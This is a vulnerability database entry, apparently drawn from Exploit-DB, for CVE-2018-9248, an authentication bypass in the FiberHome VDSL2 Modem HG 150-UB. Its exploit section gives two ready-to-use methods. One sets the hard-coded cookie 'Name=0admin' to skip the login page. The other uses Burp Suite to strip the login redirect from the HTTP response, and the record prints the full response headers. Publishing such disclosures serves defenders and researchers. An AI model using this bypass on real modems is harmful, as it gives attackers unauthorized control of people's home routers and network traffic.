ID
VAR-E-201804-0344
CVE
| cve_id: | CVE-2018-9248 | Trust: 1.5 |
EDB ID
44413
TITLE
FiberHome VDSL2 Modem HG 150-UB - Authentication Bypass - Hardware webapps Exploit
Trust: 0.6
DESCRIPTION
FiberHome VDSL2 Modem HG 150-UB - Authentication Bypass. CVE-2018-9248 . webapps exploit for Hardware platform
Trust: 0.6
AFFECTED PRODUCTS
| vendor: | fiberhome | model: | vdsl2 modem hg 150-ub | scope: | - | version: | - | Trust: 1.6 |
| vendor: | fiberhome | model: | vdsl2 modem hg 150-ub login | scope: | - | version: | - | Trust: 0.5 |
EXPLOIT
# Exploit Title: FiberHome VDSL2 Modem HG 150-UB Authentication Bypass
# Date: 04/03/2018
# Exploit Author: Noman Riffat
# Vendor Homepage: http://www.fiberhome.com/
# CVE : CVE-2018-9248, CVE-2018-9248
The vulnerability exists in plain text & hard coded cookie. Using any
cookie manager extension, an attacker can bypass login page by setting the
following Master Cookie.
Cookie: Name=0admin
Then access the homepage which will no longer require authentication.
http://192.168.10.1/
Due to improper session implementation, there is another way to bypass
login. The response header of homepage without authentication looks like
this.
HTTP/1.1 200 Ok
Server: micro_httpd
Cache-Control: no-cache
Date: Tue, 03 Apr 2018 18:33:12 GMT
Set-Cookie: Name=; path=/
Content-Type: text/html
Connection: close
<html><head><script language='javascript'>
parent.location='login.html'
</script></head><body></body></html>HTTP/1.1 200 Ok
Server: micro_httpd
Cache-Control: no-cache
Date: Tue, 03 Apr 2018 18:33:12 GMT
Content-Type: text/html
Connection: close
<html>
<head>
.. continue to actual homepage source
The response header looks totally messed up and by triggering burp suite
and modifying it to following will grant access to homepage without
authentication.
HTTP/1.1 200 Ok
Server: micro_httpd
Cache-Control: no-cache
Date: Tue, 03 Apr 2018 18:33:12 GMT
Set-Cookie: Name=; path=/
Content-Type: text/html
Connection: close
<html>
<head>
.. continue to actual homepage source
Trust: 1.0
EXPLOIT LANGUAGE
txt
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Authentication Bypass
Trust: 1.6
TAGS
| tag: | exploit | Trust: 0.5 |
| tag: | bypass | Trust: 0.5 |
CREDITS
Noman Riffat
Trust: 0.6
EXTERNAL IDS
| db: | EXPLOIT-DB | id: | 44413 | Trust: 1.6 |
| db: | NVD | id: | CVE-2018-9248 | Trust: 1.5 |
| db: | EDBNET | id: | 97384 | Trust: 0.6 |
| db: | PACKETSTORM | id: | 147045 | Trust: 0.5 |
REFERENCES
| url: | https://nvd.nist.gov/vuln/detail/cve-2018-9248 | Trust: 1.5 |
| url: | https://www.exploit-db.com/exploits/44413/ | Trust: 0.6 |
SOURCES
| db: | PACKETSTORM | id: | 147045 |
| db: | EXPLOIT-DB | id: | 44413 |
| db: | EDBNET | id: | 97384 |
LAST UPDATE DATE
2022-07-27T09:58:21.645000+00:00
SOURCES RELEASE DATE
| db: | PACKETSTORM | id: | 147045 | date: | 2018-04-04T20:49:01 |
| db: | EXPLOIT-DB | id: | 44413 | date: | 2018-04-06T00:00:00 |
| db: | EDBNET | id: | 97384 | date: | 2018-04-06T00:00:00 |